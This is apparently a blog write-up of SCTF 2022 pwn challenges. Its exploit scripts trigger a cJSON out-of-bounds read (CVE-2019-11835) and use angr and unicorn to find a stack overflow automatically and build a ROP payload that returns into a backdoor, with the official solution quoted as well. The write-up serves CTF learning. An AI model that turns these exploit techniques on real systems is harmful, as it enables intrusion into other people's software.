MENU

SCTF Pwn Writeup

March 16, 2022 • Read: 352 • Pwn,CTF

dataleak

CVE-2019-11835 (cJSON before 1.7.11: out-of-bounds access related to multi-line `/*` comments): https://github.com/DaveGamble/cJSON/issues/338

# encoding: utf-8
from pwn import *

# Module-level state shared by the helpers below.
elf = None  # never reassigned in the code shown here; Attack() takes elf as a parameter
libc = None  # replaced by ELF("./libc.so.6") in get_sh(Use_other_libc=True) when REMOTE is set
file_name = "./cJSON_PWN"  # local target binary; also the program started over ssh in get_sh()


# context.timeout = 1


def get_file(dic=""):
    """Make ``dic + file_name`` the pwntools context binary and return it.

    Assigning a path to ``context.binary`` turns it into an ``ELF`` object,
    so the returned value is that ELF, not the path string.
    """
    binary_path = dic + file_name
    context.binary = binary_path
    return context.binary


def get_libc(dic=""):
    """Return the libc the context binary is linked against, as an ``ELF``.

    If no context binary is set yet, ``dic + file_name`` is loaded first.
    The binary's ``libs`` entries are scanned for a path containing
    ``/libc.`` or ``/libc-``. If several entries match, the last one wins.

    Returns:
        ``ELF`` for the matching library, or ``None`` when nothing matched.
    """
    if context.binary is None:
        context.binary = dic + file_name
    assert isinstance(context.binary, ELF)
    libc = None
    for lib in context.binary.libs:
        if '/libc.' in lib or '/libc-' in lib:
            # No break: keep the historical "last match wins" behaviour.
            libc = ELF(lib, checksec=False)
    return libc


def get_sh(Use_other_libc=False, Use_ssh=False):
    """Open a tube to the target: a local process, an ssh-launched process, or a TCP remote.

    Without the REMOTE pwntools arg, ``file_name`` is started locally.
    With REMOTE:
      * ``Use_other_libc`` swaps the global ``libc`` for ``./libc.so.6``;
      * ``Use_ssh`` connects with argv ``host port user password`` and runs
        ``file_name`` on the remote machine;
      * otherwise argv[1] is ``host:port``, or argv[1]/argv[2] are host and port.
    """
    global libc
    if not args['REMOTE']:
        return process([file_name])

    if Use_other_libc:
        libc = ELF("./libc.so.6", checksec=False)

    if Use_ssh:
        session = ssh(sys.argv[3], sys.argv[1], int(sys.argv[2]), sys.argv[4])
        return session.process([file_name])

    endpoint = sys.argv[1]
    if ":" not in endpoint:
        return remote(endpoint, int(sys.argv[2]))
    pieces = endpoint.split(':')
    return remote(pieces[0], int(pieces[1]))


def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    """Receive a leaked address from ``sh`` and return it as an int.

    If ``start_string`` is given, input is consumed up to it first. Then the
    first matching mode applies:
      * ``libc is True``: read up to the first ``b'\\x7f'`` byte and unpack the
        last 6 bytes received, zero-padded to 8 (u64). ``info`` defaults to
        ``'libc_base:\\t'``.
      * ``int_mode``: read up to ``end_string`` (dropped) and parse it as hex text.
      * ``address_len``: unpack the first ``address_len`` bytes of the next recv().
      * otherwise: unpack the bytes before ``end_string`` as u64 on amd64,
        else as u32.
    ``offset`` is added to the result. When ``info`` is set, the value is
    logged as ``info + hex(address)``.
    """
    if start_string is not None:
        sh.recvuntil(start_string)
    # Padding uses bytes literals: under Python 3 tubes return bytes, and
    # bytes.ljust() rejects a str fill character with TypeError.
    if libc is True:
        if info is None:
            info = 'libc_base:\t'
        return_address = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len is not None:
        return_address = u64(sh.recv()[:address_len].ljust(8, b'\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, b'\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, b'\x00'))
    if offset is not None:
        return_address += offset
    if info is not None:
        log.success(info + hex(return_address))
    return return_address


def get_flag(sh):
    """Ask the (hopefully spawned) shell for the flag and return what comes back.

    Pending output is drained for 0.1 s, ``cat flag`` is sent, and everything
    received in the next 0.3 s is returned. If the tube hits EOF, "" is returned.
    """
    try:
        sh.recvrepeat(0.1)
        sh.sendline('cat flag')
        reply = sh.recvrepeat(0.3)
    except EOFError:
        return ""
    return reply


def get_gdb(sh, addr=None, gdbscript=None, stop=False):
    """Attach gdb to a local target; does nothing when the REMOTE arg is set.

    An explicit ``gdbscript`` takes precedence. Otherwise, when ``addr`` is
    given, a ``b *$rebase(addr)`` breakpoint script is used. With neither,
    gdb attaches with no script. ``stop`` pauses the exploit afterwards.
    """
    if args['REMOTE']:
        return
    if gdbscript is None and addr is not None:
        gdbscript = 'b *$rebase(' + hex(addr) + ")"
    if gdbscript is None:
        gdb.attach(sh)
    else:
        gdb.attach(sh, gdbscript)
    if stop:
        pause()


def Attack(target=None, elf=None, libc=None):
    """Run pwn() with up to three attempts, then try to read the flag.

    If the module-level ``sh`` is None, the tube, ELF and libc come from
    ``target`` (a ``Class.Target.Target``, imported only on that path).
    Otherwise the global ``sh`` is used together with the ``elf``/``libc``
    arguments.

    On EOFError the tube is closed and reopened (``target.get_sh()`` or
    ``get_sh()``) before the next attempt. KeyboardInterrupt stops retrying.

    Returns:
        get_flag() on the final tube, or the string
        'ERROR : Can not connect to target server!' when a Target reconnect fails.

    Raises:
        AssertionError if ``elf``/``libc`` are not ELF objects (note that
        get_libc() returns None when it finds no libc).
    """
    # NOTE(review): raises NameError if no module-level `sh` exists yet;
    # the __main__ block assigns it before calling.
    global sh
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            # Connection died mid-exploit: replace the tube and retry.
            sh.close()
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    # NOTE(review): if all three attempts raised EOFError, the tube opened after
    # the last failure was never exploited, so get_flag() talks to a fresh target.
    flag = get_flag(sh)
    return flag


def pwn(sh, elf, libc):
    """Send the cJSON comment payloads, then hand the tube to the user.

    ``elf`` and ``libc`` are accepted to match Attack()'s calling convention
    but are not used here.
    """
    context.log_level = "debug"
    # Four 14-byte chunks, sent back to back in this order. Each contains a
    # "/*" comment opener with no matching "*/".
    payloads = (
        "aaaaaaaaaaaa/*",
        "bbbb/*cccccccc",
        "a/*aaaaaaaaaaa",
        "bbbb/*cccccccc",
    )
    for chunk in payloads:
        sh.send(chunk)
    sh.interactive()


if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(elf=get_file(), libc=get_libc())
    sh.close()
    # Under Python 3 get_flag() returns bytes from the tube but "" on EOF, and
    # Attack() may return an error str; normalise to str so the regex works.
    if isinstance(flag, bytes):
        flag = flag.decode('latin-1')
    if flag:
        match = re.search(r'flag\{.+\}', flag)
        if match:
            log.success('The flag is ' + match.group())
        else:
            # Previously .group() on None crashed here with AttributeError.
            log.failure('No flag found in output: ' + repr(flag))

CheckIn_ret2text

unicorn + angr

用 angr 生成 main 函数的控制流图，找到返回块，往前回溯两层，然后用 unicorn 逐个模拟这些块来定位溢出点，并记录从入口到溢出点的路径。

路径上每个分支的输入分为四种情况：其中三种可以直接用 unicorn 处理，剩下一种用 angr + SimProcedure 求解。

import string
import base64
from pwn import *
from pwnlib.util.iters import bruteforce
import networkx.classes.reportviews
from pwn import *
import angr
from unicorn.x86_const import *
import am_graph
from unicorn import *

context.log_level = "debug"

# --- Unicorn memory layout ---------------------------------------------------
BASE = 0x400000                 # address the raw binary image is mapped at
CODE = BASE + 0x0
CODE_SIZE = 0x100000
STACK = 0x7F00000000
STACK_SIZE = 0x100000
RBP = STACK + 0x8000            # fixed fake frame pointer; overflow checks compare against it
RSP = RBP - 0x1000 - 0x420      # stack pointer placed below that frame

# --- CFG search state (find_path) --------------------------------------------
RETN_DEEP = 0                   # depth at which find_path reached the block with no out-branches

# --- overflow detection (written by hook_block) ------------------------------
FOUND_OVERFLOW = False
OVERFLOW_OFFSET = 0             # distance from the read buffer (RDI) up to RBP
OVERFLOW_LEN = 0                # length argument (RSI) of the overflowing read
PATH = []                       # super-nodes leading to the overflowing block

# --- per-edge solving state shared with hook_block ---------------------------
TYPE = -1                       # 1 once the compare hook fired, 2 once the input_val hook fired
CODE_LOW = 0                    # [CODE_LOW, CODE_HIGH) is the block being emulated
CODE_HIGH = 0
CODE_TARGET = 0                 # successor block that should be reached
CODE_CON = -1                   # 0 = left via CODE_TARGET, 1 = left elsewhere, -1 = unknown
CODE_OUTPUT = ""                # last string passed to printf, used to sync with the remote
CODE_EXIT = 0                   # address of the block with no out-branches (main's return)

TYPE1_STR = ""
TYPE1_READLEN = 0
TYPE2_CNT = 0


def u2s(n):
    """Reinterpret an unsigned 32-bit value as signed.

    Values at or above 2**31 have 2**32 subtracted; everything else is
    returned unchanged.
    """
    if n >= 0x80000000:
        return n - 0x100000000
    return n


def retn(uc, retn=0):
    """Skip the current function inside Unicorn by emulating an immediate ``ret``.

    Expects [RSP] to hold the caller's return address, i.e. the hook fired on
    the function's first block. Sets RAX to ``retn`` (the fake return value),
    pops the return address and resumes execution there.
    """
    rsp = uc.reg_read(UC_X86_REG_RSP)
    retn_addr = u64(uc.mem_read(rsp, 8))
    uc.reg_write(UC_X86_REG_RAX, retn)
    # Pop the return address exactly like `ret`. Without this, every skipped
    # call leaves 8 stray bytes on the emulated stack and RSP drifts downward.
    uc.reg_write(UC_X86_REG_RSP, rsp + 8)
    uc.reg_write(UC_X86_REG_RIP, retn_addr)


def _read_cstring(uc, addr):
    """Return the NUL-terminated byte string at ``addr`` in emulator memory, without the NUL."""
    buf = bytearray()
    while True:
        ch = uc.mem_read(addr, 1)
        if ch == b'\x00':
            return bytes(buf)
        buf += ch
        addr += 1


def hook_block(uc, address, size, user_data):
    """Unicorn basic-block hook that fakes library calls and records solver state.

    The hard-coded addresses are specific to the challenge binary's layout.
      * printf stub (``address + 4 == elf.plt['printf']``): store the string at
        RDI in CODE_OUTPUT and skip the call.
      * 0x401272 (input_line): record RSI in TYPE1_READLEN. If
        RDI < RBP < RDI + RSI, flag an overflow and set OVERFLOW_OFFSET =
        RBP - RDI and OVERFLOW_LEN = RSI; otherwise clear FOUND_OVERFLOW.
        Skip the call.
      * 0x4012CE (compare): TYPE = 1. TYPE1_STR becomes the byte-wise XOR of
        the strings at RDI and RSI, up to RSI's NUL. Skip the call, returning 1.
      * 0x401216 (input_val): TYPE = 2, TYPE2_CNT += 1, skip the call.
      * 0x40137A (init): skip the call.
      * CODE_EXIT: stop emulation.
      * Any address outside [CODE_LOW, CODE_HIGH), once CODE_LOW is set:
        CODE_CON = 0 if it is CODE_TARGET, else 1; then stop emulation.
    """
    global FOUND_OVERFLOW, CODE_LOW, CODE_HIGH, CODE_TARGET, TYPE, CODE_CON, TYPE2_CNT, TYPE1_STR, TYPE1_READLEN, CODE_OUTPUT, OVERFLOW_OFFSET, OVERFLOW_LEN
    if address + 4 == elf.plt['printf']:
        rdi = uc.reg_read(UC_X86_REG_RDI)
        # latin-1 maps every byte to one character. This matches the
        # .encode('latin-1') used when syncing with the remote and, unlike the
        # old per-byte UTF-8 decode, cannot fail on non-ASCII output.
        CODE_OUTPUT = _read_cstring(uc, rdi).decode('latin-1')
        retn(uc)
        return
    if address == 0x401272:
        rdi = uc.reg_read(UC_X86_REG_RDI)
        rsi = uc.reg_read(UC_X86_REG_RSI)
        TYPE1_READLEN = rsi
        if rdi + rsi > RBP and rdi < RBP:
            FOUND_OVERFLOW = True
            OVERFLOW_OFFSET = RBP - rdi
            OVERFLOW_LEN = rsi
            print('overflow')
        else:
            FOUND_OVERFLOW = False
        retn(uc)
        return
    if address == 0x4012CE:
        TYPE = 1
        rdi = uc.reg_read(UC_X86_REG_RDI)
        rsi = uc.reg_read(UC_X86_REG_RSI)
        TYPE1_STR = ""
        while True:
            ch1 = uc.mem_read(rdi, 1)
            ch2 = uc.mem_read(rsi, 1)
            if ch2 == b'\x00':
                break
            TYPE1_STR += chr(ord(ch1) ^ ord(ch2))
            rdi += 1
            rsi += 1
        retn(uc, 1)
        return
    if address == 0x401216:
        TYPE = 2
        TYPE2_CNT += 1
        retn(uc)
        return
    if address == 0x40137A:
        retn(uc)
        return
    if address == CODE_EXIT:
        uc.emu_stop()
        return
    if CODE_LOW != 0 and not CODE_LOW <= address < CODE_HIGH:
        # Execution left the block under test: note which successor was taken.
        CODE_CON = 0 if address == CODE_TARGET else 1
        uc.emu_stop()


def find_path(x, fa, node):
    """Depth-first search of ``supergraph`` that locates the overflowing block.

    Args:
        x: current recursion depth (0 at the entry node).
        fa: parent node (the top-level call passes the entry node as its own parent).
        node: current super-node.

    A node with no out_branches is treated as the return block: its address
    goes to CODE_EXIT, its depth to RETN_DEEP, and False is returned. After
    exploring its children, a node at depth RETN_DEEP - 2 is emulated with
    Unicorn. If hook_block then reports FOUND_OVERFLOW, the node is appended
    to PATH and True propagates upward, with each ancestor appending itself.
    PATH therefore ends up in leaf-to-entry order.

    Returns:
        True when the overflow block was found below ``node``; otherwise False or None.
    """
    global RETN_DEEP, CODE_EXIT
    # NOTE(review): assumes every super-node has at most one out_branches entry.
    assert len(node.out_branches) <= 1
    if len(node.out_branches) == 0:
        CODE_EXIT = node.addr
        RETN_DEEP = x
        return False
    for edge in supergraph.out_edges(node):
        to = edge[1]
        if find_path(x + 1, node, to):
            if fa.addr != node.addr:
                print(hex(fa.addr) + "->" + hex(node.addr))
            PATH.append(node)
            return True

    # Two levels above the return block: emulate this node and see whether its
    # input call can write past RBP.
    if x == RETN_DEEP - 2:
        try:
            uc.emu_start(node.addr, node.addr + node.size)
        except Exception as e:
            print(e)
        if FOUND_OVERFLOW:
            PATH.append(node)
            return True
    # print(hex(node.addr), supergraph.in_degree(node), supergraph.out_degree(node), len(node.out_branches))


def init(uc):
    """Prepare the Unicorn engine for emulating the downloaded binary.

    Maps the code and stack regions with full permissions and writes the raw
    file bytes CODE_DATA at CODE (file offset 0 lands at CODE). Sets RSP/RBP
    to the fixed fake frame and installs hook_block as the basic-block hook.
    """
    for region_base, region_size in ((CODE, CODE_SIZE), (STACK, STACK_SIZE)):
        uc.mem_map(region_base, region_size, UC_PROT_ALL)
    uc.mem_write(CODE, CODE_DATA)
    for register, value in ((UC_X86_REG_RSP, RSP), (UC_X86_REG_RBP, RBP)):
        uc.reg_write(register, value)
    uc.hook_add(UC_HOOK_BLOCK, hook_block)


def passpow():
    """Solve the server's proof of work read from the global tube ``sh``.

    Parses ``sha256(xxxx + <suffix>) == <hex digest>`` from the stream and
    brute-forces a 4-character xxxx over ASCII letters and digits so that
    sha256(xxxx + suffix).hexdigest() equals the digest.

    Returns:
        The 4-character answer, or None if pwntools' bruteforce finds none.
    """
    # Imported explicitly rather than relying on `from pwn import *` happening
    # to re-export hashlib.
    import hashlib

    sh.recvuntil('sha256(xxxx + ')
    last = sh.recvuntil(')', drop=True)
    sh.recvuntil(' == ')
    target = sh.recvuntil(' ', drop=True)
    print(last, target)
    return bruteforce(lambda x: hashlib.sha256(x.encode() + last).hexdigest().encode() == target,
                      string.ascii_letters + string.digits, length=4, method='fixed')


filename = r"vul"

sh = remote('123.60.82.85', 1447)
x = passpow()
sh.recvuntil("give me xxxx:")
sh.sendline(x)
# drop=True keeps the '==end==' terminator out of the base64 text. Lenient
# b64decode would otherwise try to decode its letters and can append junk
# bytes to the saved binary.
ba = sh.recvuntil('==end==', drop=True)
CODE_DATA = base64.b64decode(ba)
with open(filename, "wb") as fp:
    fp.write(CODE_DATA)

# Unicorn engine with the raw binary mapped at CODE (see init()).
uc = Uc(UC_ARCH_X86, UC_MODE_64)
init(uc)

elf = ELF(filename)
project = angr.Project(filename, load_options={'auto_load_libs': False})
assert isinstance(project.analyses, angr.analyses.analysis.AnalysesHub)
cfg = project.analyses.CFGFast(normalize=True, force_complete_scan=False)
assert isinstance(cfg, angr.analyses.CFGFast)
main_addr = elf.sym['main']
main_fun = cfg.functions.get(main_addr)
assert isinstance(main_fun, angr.knowledge_plugins.functions.Function)

# Collapse main's CFG into super-nodes for the path search.
supergraph = am_graph.to_supergraph(main_fun.graph)
assert isinstance(supergraph, networkx.classes.digraph.DiGraph)

# Entry node: the first super-node without predecessors.
IN_NODE = None
for node in supergraph.nodes():
    assert isinstance(node, am_graph.SuperCFGNode)
    if supergraph.in_degree(node) == 0:
        IN_NODE = node
        break

assert IN_NODE is not None
find_path(0, IN_NODE, IN_NODE)

# find_path appends while unwinding (deepest node first); flip to entry-first order.
PATH.reverse()
print(PATH)

init_state = project.factory.entry_state()


class inputSim(angr.SimProcedure):
    """Stand-in for input_val(): read 4 bytes from symbolic stdin and return them as the call's result."""

    def run(self):
        stdin_file = self.state.posix.get_fd(0)
        chunk, _length = stdin_file.read_data(4)
        return chunk


project.hook_symbol("_Z9input_valv", inputSim())

# Walk PATH edge by edge. Emulate each block to learn which kind of input
# decides the branch, compute that input, and feed it to the remote.
for fa, to in zip(PATH, PATH[1:]):
    print("Solve: " + hex(fa.addr) + '->' + hex(to.addr))
    try:
        CODE_LOW = fa.addr
        CODE_HIGH = fa.addr + fa.size
        CODE_TARGET = to.addr
        CODE_CON = -1
        TYPE2_CNT = 0
        uc.emu_start(CODE_LOW, CODE_HIGH)
        if CODE_CON == -1:
            # The hook never saw an exit from the block; treat it as "went elsewhere".
            CODE_CON = 1
        print(TYPE, CODE_CON)

        if TYPE == 1:
            CODE_INPUT = 'a' * TYPE1_READLEN if CODE_CON == 0 else TYPE1_STR
        elif CODE_CON == 0:
            CODE_INPUT = ' ' * TYPE2_CNT
        else:
            init_state.regs.rip = fa.addr
            sm = project.factory.simulation_manager(init_state)
            sm.explore(find=to.addr)
            assert len(sm.found) > 0
            stdin_bytes = sm.found[0].posix.dumps(0)
            # inputSim returns each 4-byte stdin chunk as one bitvector whose
            # first byte is most significant. The value the program compared is
            # therefore the big-endian reading of the dumped bytes; u32() would
            # byte-swap it.
            CODE_INPUT = "".join(
                str(int.from_bytes(stdin_bytes[j:j + 4], 'big')) + " "
                for j in range(0, len(stdin_bytes), 4)
            )
        print(CODE_OUTPUT)
        print(CODE_INPUT)
        sh.recvuntil(CODE_OUTPUT.encode(encoding='latin-1'))
        sh.send(CODE_INPUT.encode(encoding='latin-1'))
    except Exception as e:
        # Best effort: report and move on to the next edge.
        print(e)

print('OVERFLOW_OFFSET:' + str(OVERFLOW_OFFSET))
print('OVERFLOW_LEN:' + str(OVERFLOW_LEN))

# Fake saved RBP in .bss, then jump one byte into CODE_EXIT, then the backdoor.
payload = b'a' * OVERFLOW_OFFSET + p64(elf.bss() + 0x500) + p64(CODE_EXIT + 0x1) + p64(elf.sym['_Z8backdoorv'])
payload = payload.ljust(OVERFLOW_LEN, b'x')
sh.send(payload)
pause()
sh.sendline(b"ls")
sh.sendline(b"cat flag")
sh.interactive()

后来看了官方 WP，发现自己做复杂了。这里贴一下官方的 exp，其中 save_unconstrained 的用法值得学习。

from pwn import *
import angr
import claripy
import base64
def pass_proof(target, part, alphabet=None, length=4):
    """Brute-force the server's proof of work.

    Finds a ``length``-character prefix xxxx over ``alphabet`` such that
    sha256(xxxx + part).hexdigest() equals ``target``. Previously this was a
    stub that returned None, which made the caller's ``.encode`` crash.

    Args:
        target: expected hex digest; surrounding whitespace and case are ignored.
        part: known suffix (str or bytes).
        alphabet: candidate characters; defaults to ASCII letters + digits.
        length: number of unknown characters.

    Returns:
        The matching prefix as str.

    Raises:
        ValueError: if no candidate matches.
    """
    import hashlib
    import itertools
    import string

    if alphabet is None:
        alphabet = string.ascii_letters + string.digits
    wanted = target.strip().lower()
    suffix = part if isinstance(part, bytes) else part.encode()
    for combo in itertools.product(alphabet, repeat=length):
        candidate = ''.join(combo)
        if hashlib.sha256(candidate.encode() + suffix).hexdigest() == wanted:
            return candidate
    raise ValueError('no proof-of-work solution for digest ' + wanted)

r = remote("123.60.82.85", 1447)
r.recvline()
r.recvline()
r.recvline()
proof = r.recvline().decode("ASCII")
ppp = pass_proof(proof[proof.find("== ") + 3: -2], proof[len("sha256(xxxx + "): proof.find(") == ")])
r.sendlineafter(b"give me xxxx:", ppp.encode("ASCII"))
r.recvline()
bin_data = base64.b64decode(r.recvline().decode("ASCII"))
###########################################################################################################
# Close (and flush) the file before angr reopens it below, instead of relying
# on the temporary file object being garbage-collected.
with open("a.out", "wb") as out_file:
    out_file.write(bin_data)
# First 0xc3 (`ret`) byte at file offset >= 0x1000, turned into an address by
# adding 0x400000.
# NOTE(review): assumes file offset + 0x400000 == virtual address (non-PIE
# image with identity-offset segments) - confirm for each downloaded binary.
ret_rop = bin_data.find(b'\xc3', 0x1000) + 0x400000
print("ret_rop:", hex(ret_rop))

p = angr.Project("./a.out")

def getBVV(state, sizeInBytes, type='str'):
    """Create a fresh symbolic bitvector of ``sizeInBytes`` bytes and register it in ``state.globals``.

    Despite the name, the result is a symbolic ``claripy.BVS``, not a concrete BVV.
    Symbols are named 's_0', 's_1', ... from the counter
    ``state.globals['symbols_count']``, which must already be initialised.
    ``state.globals[name]`` is set to ``(bvs, type)`` so the solver loop can
    rebuild the program input in creation order. ``type`` ('str' or 'int')
    tells that loop how to serialise the value. The parameter name shadows
    the builtin but is kept for keyword callers.
    """
    # (The former `global pathConditions` declaration was never used and is gone.)
    name = 's_' + str(state.globals['symbols_count'])
    bvs = claripy.BVS(name, sizeInBytes * 8)
    state.globals['symbols_count'] += 1
    state.globals[name] = (bvs, type)
    return bvs

def angr_load_str(state, addr):
    """Concretize the NUL-terminated string at ``addr`` in ``state`` and return it as str.

    Bytes are loaded one at a time and concretized with ``state.solver.eval``.
    Each byte value becomes one character via ``chr``.
    """
    chars = []
    offset = 0
    byte = state.solver.eval(state.memory.load(addr + offset, 1))
    while byte != 0:
        chars.append(chr(byte))
        offset += 1
        byte = state.solver.eval(state.memory.load(addr + offset, 1))
    return ''.join(chars)

class ReplacementCheckEquals(angr.SimProcedure):
    """Replacement for the binary's string-compare helper (hooked as _Z5fksthPKcS0_).

    The string at ``str2`` is concretized. RAX becomes a symbolic 32-bit
    expression: 0 when the first len(str2) bytes at ``str1`` equal it,
    otherwise 1.
    """

    def run(self, str1, str2):
        expected = angr_load_str(self.state, str2).encode("ascii")
        actual = self.state.memory.load(str1, len(expected))
        match_flag = claripy.If(expected == actual, claripy.BVV(0, 32), claripy.BVV(1, 32))
        self.state.regs.rax = match_flag

class ReplacementCheckInput(angr.SimProcedure):
    """Replacement for input_line (hooked as _Z10input_linePcm).

    Fills ``buf`` with a fresh symbolic string whose length is the concretized
    ``len`` argument.
    """

    def run(self, buf, len):
        byte_count = self.state.solver.eval(len)
        symbolic_input = getBVV(self.state, byte_count)
        self.state.memory.store(buf, symbolic_input)

class ReplacementInputVal(angr.SimProcedure):
    """Replacement for input_val (hooked as _Z9input_valv): RAX becomes a fresh 4-byte symbolic 'int'."""

    def run(self):
        symbolic_value = getBVV(self.state, 4, 'int')
        self.state.regs.rax = symbolic_value

class ReplacementInit(angr.SimProcedure):
    """No-op replacement for the binary's init routine (hooked as _Z4initv)."""

    def run(self):
        return None

p.hook_symbol("_Z5fksthPKcS0_", ReplacementCheckEquals())
p.hook_symbol("_Z10input_linePcm", ReplacementCheckInput())
p.hook_symbol("_Z9input_valv", ReplacementInputVal())
p.hook_symbol("_Z4initv", ReplacementInit())
enter = p.factory.entry_state()
enter.globals['symbols_count'] = 0
# save_unconstrained=True keeps states whose instruction pointer became
# symbolic (the overflow) in the `unconstrained` stash instead of dropping them.
simgr = p.factory.simgr(enter, save_unconstrained=True)
d = simgr.explore()
backdoor = p.loader.find_symbol('_Z8backdoorv').rebased_addr
for state in d.unconstrained:
    rsp = state.regs.rsp
    next_stack = state.memory.load(rsp, 8, endness=p.arch.memory_endness)
    # Return into a bare `ret`, which then pops the backdoor address.
    state.add_constraints(state.regs.rip == ret_rop)
    state.add_constraints(next_stack == backdoor)
    if not state.satisfiable():
        # This overflow cannot be steered this way; evaluating would raise. Try the next one.
        continue
    parts = []
    for idx in range(state.globals['symbols_count']):
        sym, sym_type = state.globals['s_' + str(idx)]
        if sym_type == 'str':
            raw = state.solver.eval(sym, cast_to=bytes)
            if not any(raw):
                # An all-NUL solution is sent as the same number of 'A's.
                raw = b'A' * len(raw)
            parts.append(raw)
        elif sym_type == 'int':
            parts.append(str(state.solver.eval(sym, cast_to=int)).encode('ASCII') + b' ')
    bindata = b''.join(parts)
    print(bindata)
    r.send(bindata)
    r.interactive()
    break
else:
    print('no unconstrained state could be redirected to the backdoor')
Archives QR Code
QR Code for this page
Tipping QR Code